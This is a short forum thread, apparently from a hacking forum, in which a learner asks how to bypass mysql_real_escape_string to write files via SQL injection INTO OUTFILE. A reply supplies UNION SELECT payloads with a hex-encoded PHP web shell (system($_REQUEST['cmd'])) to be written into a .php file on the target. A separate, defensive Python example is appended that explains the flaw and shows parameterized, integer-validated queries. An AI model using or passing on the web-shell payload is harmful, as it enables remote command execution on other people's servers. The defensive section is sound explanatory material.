[Ask] SQL Injection INTO OUTFILE bypass mysql_real_escape_string
#1
[Image: Screenshot_from_2015_08_15_11_31_52.jpg]

I want to ask about bypassing mysql_real_escape_string for outfile.

First I checked the user and file_privilege. The result: root, with file write access.

[Image: Screenshot_from_2015_08_15_11_38_34.png]

But when I tried to upload, this is what I got. I hex-encoded the path because the ' character is filtered.

[Image: Screenshot_from_2015_08_15_11_45_13.png]

Please enlighten me, brother, I am still learning.
If you cannot bear the weariness of learning, you will have to bear the sting of ignorance (Imam Syafii)

#2
Try this:
..?id=-1 UniOn SeleCt 0x223c3f2073797374656d28245f524551554553545b27636d64275d293b203f3e22 into outfile '/ur/path/here/lol.php'--+-
or:
..?id=-1 UniOn SeleCt 0x223c3f2073797374656d28245f524551554553545b27636d64275d293b203f3e22 into outfile '/ur/path/on/hex/here/lol.php'--+

#3
(09-13-2015, 01:06 AM)Guest Wrote: Try this:
..?id=-1 UniOn SeleCt 0x223c3f2073797374656d28245f524551554553545b27636d64275d293b203f3e22 into outfile '/ur/path/here/lol.php'--+-
or:
..?id=-1 UniOn SeleCt 0x223c3f2073797374656d28245f524551554553545b27636d64275d293b203f3e22 into outfile '/ur/path/on/hex/here/lol.php'--+

But mysql_real_escape_string will add a backslash to every single quote. Example: INTO OUTFILE '/path' will become INTO OUTFILE \'/path\'. So it won't work.
If you cannot bear the weariness of learning, you will have to bear the sting of ignorance (Imam Syafii)
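
An added example, not part of the thread or any poster's code: a defender's view of why escaping alone does not protect an unquoted `id` parameter, next to a hardened form. The `emulate_real_escape` function is a simplified stand-in for mysql_real_escape_string, and the table, column and function names are hypothetical.

```python
import re

# Characters that PHP's mysql_real_escape_string() prefixes with a backslash.
_ESCAPES = {"\x00": "\\0", "\n": "\\n", "\r": "\\r", "\\": "\\\\",
            "'": "\\'", '"': '\\"', "\x1a": "\\Z"}


def emulate_real_escape(value: str) -> str:
    """Simplified emulation (assumption) of mysql_real_escape_string()."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def build_query_unquoted(raw_id: str) -> str:
    """Weak pattern: escaped input concatenated into a numeric context."""
    # Table and column names are hypothetical.
    return "SELECT title FROM news WHERE id=" + emulate_real_escape(raw_id)


def parse_id(raw_id: str) -> int:
    """Hardened: accept only 1-10 ASCII digits and return an int."""
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        raise ValueError("id must be a non-negative integer")
    return int(raw_id)


def build_query_parameterized(raw_id: str):
    """Hardened: constant SQL text, value passed separately to the driver."""
    return "SELECT title FROM news WHERE id = %s", (parse_id(raw_id),)


def is_rejected(raw_id: str) -> bool:
    try:
        parse_id(raw_id)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    # Constructed inputs, not taken from a real application.
    quoted = "1 INTO OUTFILE '/path'"
    unquoted = "1 OR 1=1"
    print(build_query_unquoted(quoted))    # quotes gain backslashes
    print(build_query_unquoted(unquoted))  # passes through unchanged
    print(is_rejected(quoted), is_rejected(unquoted))
    print(build_query_parameterized("42"))
```

On the database side, an application account without the FILE privilege and a restrictive `secure_file_priv` setting limit what INTO OUTFILE can do even if a query is injectable.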





